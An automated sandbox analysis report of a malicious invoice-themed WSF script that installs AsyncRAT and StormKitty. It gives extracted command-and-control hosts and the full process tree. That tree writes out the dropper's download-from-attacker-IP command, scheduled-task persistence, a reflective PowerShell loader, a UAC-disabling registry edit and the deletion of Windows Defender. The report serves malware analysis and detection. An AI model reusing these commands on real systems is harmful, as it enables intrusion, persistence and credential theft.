Analysis
-
max time kernel
164s -
max time network
210s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
05-06-2024 11:54
General
-
Target
Invoice#1136309464.wsf
-
Size
107KB
-
MD5
ab87b1030210083dfb5b1e4f11647846
-
SHA1
c53b4eaece77ca95b11b0facb82fc81af7e6735b
-
SHA256
5569aaf9f9d3e53647419506c0cb256ac27d7538d2544a7031c2d7d31df0cb58
-
SHA512
2980941237f69d4ebf380af918144f7a9acef04d7ca195f2e1531e1de6ea2ded17ce0115fd66db5fc7d526397634d22ec80ee33d987f25ca369de0558d672735
-
SSDEEP
384:qR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6cR6wR6cR6cR6cR6cR6cR6cR6cR6cR6N:14JElDTR
Malware Config
Extracted
http://162.244.210.92:333/kok.jpg
Extracted
https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip
Extracted
https://nodejs.org/download/release/latest-v0.12.x/node.exe
Extracted
asyncrat
AWS | 3Losh
Karem
kareemovic11.duckdns.org:6606
kareemovic11.duckdns.org:7707
kareemovic11.duckdns.org:8808
AsyncMutex_kinsdlmsjnsidhuybf
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 4 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Nirsoft 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
ACProtect 1.3x - 1.4x DLL software 5 IoCs
Detects file using ACProtect software.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 7 IoCs
-
Loads dropped DLL 3 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 5 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#1136309464.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://162.244.210.92:333/kok.jpg' -Destination 'C:\Users\Public\bbbb.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\bbbb.zip' -DestinationPath 'C:\Users\Public'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip' -Destination 'C:\Users\Public\chrome.zip'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path 'C:\Users\Public\chrome.zip' -DestinationPath 'C:\Users\Public\'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\Auto.vbs" ""2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\AutoHotkey.exe'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('KaR3Em', $ta, 6, $null, $null, 3);"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\AutoHotkey.exe"C:\Users\Public\AutoHotkey.exe" "C:\Users\Public\AutoHotkey"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\node.exeC:\Users\Public\node.exe C:\Users\Public\run.js5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"8⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\1oy0hpb5.inf9⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\p5c2h250.inf9⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /im cmstp.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\system32\cmstp.exe" /au C:\Windows\temp\5pu2fdzk.inf9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.html9⤵
-
C:\Users\Admin\AppData\Local\Temp\All-In-One.exeAll-In-One.exe OutPut.html10⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.html9⤵
-
C:\Users\Admin\AppData\Local\Temp\All-In-One.exeAll-In-One.exe OutPut.html10⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\listps.exe"C:\Users\Admin\AppData\Local\Temp\listps.exe" C:\Users\Public\listps.txt9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 111610⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe"C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.exe" /stext C:\Users\Admin\AppData\Local\Temp\WebBrowserPassView.txt9⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3756,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:81⤵
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\IObitUnlocker\IObitUnlocker.exeC:\ProgramData\IObitUnlocker\IObitUnlocker.exe /Delete "C:\Program Files\Windows Defender,C:\Program Files (x86)\Windows Defender"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\remove.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Public\Remove.ps1"",0:close")2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command C:\Users\Public\Remove.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\AutoHotkey.exeC:\\Users\\Public\\AutoHotkey.exe1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/latest-v0.12.x/node.exe' -Destination 'C:\Users\Public\node.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\node.exe C:\Users\Public\run.js2⤵
-
C:\Users\Public\node.exeC:\Users\Public\node.exe C:\Users\Public\run.js3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'""4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "function fromHex { param([string] $str)$hex = $str.Split(' '); $result = New-Object 'byte[]' ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$msg = (Get-Content -Path 'C:\Users\Public\msg.txt');$runpe = (Get-Content -Path 'C:\Users\Public\runpe.txt');$result = fromHex $msg;$runpeD = fromHex $runpe;$new = (Get-Content -Path 'C:\Users\Public\NewPE2.txt');$Execute = (Get-Content -Path 'C:\Users\Public\Execute.txt');$Invoke = (Get-Content -Path 'C:\Users\Public\Invoke.txt');$load = (Get-Content -Path 'C:\Users\Public\load.txt');$ype = (Get-Content -Path 'C:\Users\Public\Gettype.txt');$getM = (Get-Content -Path 'C:\Users\Public\getMethod.txt');[Reflection.Assembly]::$load([Byte[]]$runpeD).$ype($new).$getM($Execute).$Invoke($null,[Object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$null,[Byte[]]$result,$true)); Stop-Process -Name 'node'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5024 -ip 50241⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Modify Registry
3Impair Defenses
2Disable or Modify Tools
2Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\IObitUnlocker\IObitUnlocker.dllFilesize
71KB
MD5e1a4327af3cd8ca866996f472f0ff93a
SHA1cfea8426ef8fab4136055401152821a19f908d45
SHA2565f0bc7d75f32981e0e704c2217ed423c9a355f19515a1603103cc55cf9d3b901
SHA512745f1ec495869d2fa2722ecadcaa27ec1f005742c69110802e9e1d7600d680d077e9762a400799e38003a4671a2590ecf1c480c2e7586039ebcce6ed36662280
-
C:\ProgramData\IObitUnlocker\IObitUnlocker.exeFilesize
2.3MB
MD59303575597168ef11790500b29279f56
SHA1bfab0ea30c5959fda893b9ddc6a348a4f47f8677
SHA2560a507a553010c19369f17b649c5ffe6060216480059062ff75241944cf729bd7
SHA5128e9f7a98c0a0c90643403d4abccd8736d12ba6bef83679ccfd626e52e86ed7db6fe558c6ec48a88cf32967c00d66131f550ac64cc98cd73fd477f165694e68b0
-
C:\ProgramData\IObitUnlocker\IObitUnlocker.sysFilesize
65KB
MD547aa03a10ac3a407f8f30f1088edcbc9
SHA1b5d78a1d3ae93bd343c6d65e64c0945d1d558758
SHA256c79a2bb050af6436b10b58ef04dbc7082df1513cec5934432004eb56fba05e66
SHA5123402ca68b00ffd9e2551f97b3895990ee0274f14f117505c3588ea76c716488860ac2da07c1d9275bbc43eb87b88893c52fb04d15f1afe7b7bf7d9a524961101
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5fe3aab3ae544a134b68e881b82b70169
SHA1926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA5123fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD564565b5b837feca7ec75ae007761e42a
SHA1ab509d3102cb94ba00c097b131cff48c967ef54c
SHA2564f71cf59a481912f5172a92c09c0182f95a9a679f3d533603f14e29878da980d
SHA5120d20c85e4284c713c2132b913f98a01d4ce707026a3c605ef51a030d92a7425cf74ad0e4e85966e4cdb5c4c40605dd9f3bc7c2fd8c810e842b5346bd137f232b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f36a8ca725c6705d2bcfd448e535679d
SHA13ea33d9a7239327f2b4352bd25e27d351ac4940d
SHA2561cf33dd324d1e2f41e7bc615431bdc690e0e1e38e0fc11a7d61b8b597d056f64
SHA512fa03cc94788f8a6d72ff6773a46382712b45f7d4b5998e4905e8fb59d107b3dec93c3d146901eac434ad90bb8017d2cf65ae7067861f4d05d95843bd1faafcdb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5c0bbc8151c26d53df339c1fd03330139
SHA1dacb87300a121faa702b825c5dd33703b4e546c2
SHA25603e2722eb9461a7d2f87287d338d18e373a3bb736ec949b30fb48dfc65423511
SHA512683f31245c4a411df71e1c2afe97b06b688e2e515b9fbcc1305ba43ef5f9d59dbaaf4fac115ca9e27456c5cf1a6e47935f8f8e5f1075f1128ff5a62014619e70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5f03b69e357284efcff51791a04cf2bd9
SHA18c02f43e4440f5ce7f0e3296ccbf2bd883ffedee
SHA256a0ea25c719fd124426eef63843c6972da2f51d65eb3f5eaf8b91caead13f82f5
SHA5122bef765a3024a35938c067f2bc0b3a7b7787d134e1f9500266eb1ca45503aaed4ef666a364136b547d536fcae49b85cea9a6bdc1fcf03bbd0f3c47e9ccffc7a4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD54abe7caf3aa096ef475852e0a18e5800
SHA17a8166845e3ff223cff9cea57f702ef9457d8821
SHA256f25993351a9859c09e9a059016184d78e4679be1ea21e45426b4358878427414
SHA512628e86ad7f932b7fa007f568824e14f9d50a47057d105c9efdd15725da313607a4fdabf1841399ae68a1ed15401a73f12ffcd200b4a43a78b57c8f86aa7a3de8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5a4715cf6428da6707f8bc39323d8d798
SHA1e62c65dc9e4b49a3f6245cec2b322a3a919141e2
SHA256465fe47dba4f0faac69fc726210e80051a4b1f71bfa6a67916e9280cfd716533
SHA5120c2e2e5157d8c7ba62aa41d258510c81578c80cfa4561015bbf28c7f2e7e440fddd546c89e192d4160cee93af53caf8c9faa40ec2e3cc6918ae3b287298dee0b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5eb5b362957ad5fe02d894995151da662
SHA133ac65e230da48dcd1318e6cda14f3430eab0020
SHA256371c57614512ab14280434cab059859d21e01ca533ced7b4f367ba800e09e76b
SHA51296a63c2691a523833328ebf79fb6d000a11b44076c482eb689c5f41bb57d8b730baafb6f37a9770883bbfeee5140257228e00e2442a2a6d76a64acbc790b996e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD5db8f97beb611ff5c5f13d134384143e7
SHA10c003d0dcff18693123115faeab68eb1ee64a89c
SHA2561decaeef717d5a2b53f7e5845db8b9163a4ca83f6ff6ebe5c51f004a15bcb8e1
SHA5127932835e2bfd948336fb759b6b8d3d159e959a20af446988cdb7f3de3d3445b4a2cef6270ac7da4eed6dd833ed597f1200f79a61da1d98c3cd8228cf278ef501
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
19KB
MD571b3a71bb8b8aa725afde4f9e6be97d3
SHA1f26f0fae5cf47a29163324c4578be5f412cd11fb
SHA256b37b42b4ce7bfbd8844b2395ab34091290b8768119c599ba92b3381eb050dfd3
SHA5128a35bb6b037a8ec93d9bc6272ca0b8c1591985ccac31565a906e36e24682ddf0b406754f3764a8914a912005a5e156cbf8c5212deea2a31ff6e33e58f6dc1afe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD5740748a0eb02aa9d2d4ee1121134721f
SHA154a8bd7097e4763df65ac65b74e5a1845a2c6c5e
SHA2565fa06a7a879da96f7823aca0cf2e775d18781b391ba6f3fdd1d6c930b51de030
SHA5120a1997afc1344467443f18a3257ec7aa199ee4c1c4ec30a9c516ab372d7ce4579f5117a1e72036bbc81ffb36a118fc1d8fa49797a8c74a64f017735f8506f85a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD59046e5a260a38d868036ba71b66540cb
SHA1b8ad5ddac7cd126c632ba0ac21b2499469b5f1b5
SHA2560c38f829adbb9e499cc24f3798f3187aab7ec0709127446fd2b2d5e112633063
SHA51272c385636b9b56b674dcd14de8399822653c1be9fce643e316359704fd56c7c72b72b2fbc36a81ef5f9d2721c326d1c833297898d13b4d45667c68dfc7385403
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57c7b47bcefc6cf9e5c77bad3e70ea1a2
SHA1936f4f93f5cad380ae53462b8991187cdbe22a70
SHA2567dc5103d2c5cee0a6acda40c498f6a36fb561c2d942523b30eba9a23b42bb641
SHA512bd452227a5cd880a90388408c6794840a20dfeef8f9af814e7d043e6e31d1e39ed24a0358fee918b4c9f18ccce210b16c7016de354e47aa311d79e6224779387
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b5e87d7ffc0ffaf479a58d0aa265f462
SHA16773e22cddbc68c5ca25992a9b36d40cff311efe
SHA2567a8587541fec63b174996575d725c7a04a7950cfbf512b5d8012cde91be1b76c
SHA5128221bafd84abc79effa441a952e97a4ca5e82705638b966902e888db51b26c7776c7d5cd1fb14fd6151391c9e067014bf32a6aec5d38687238abf552986b3ad9
-
C:\Users\Admin\AppData\Local\Temp\All-In-One.exeFilesize
5.1MB
MD5a48e3197ab0f64c4684f0828f742165c
SHA1f935c3d6f9601c795f2211e34b3778fad14442b4
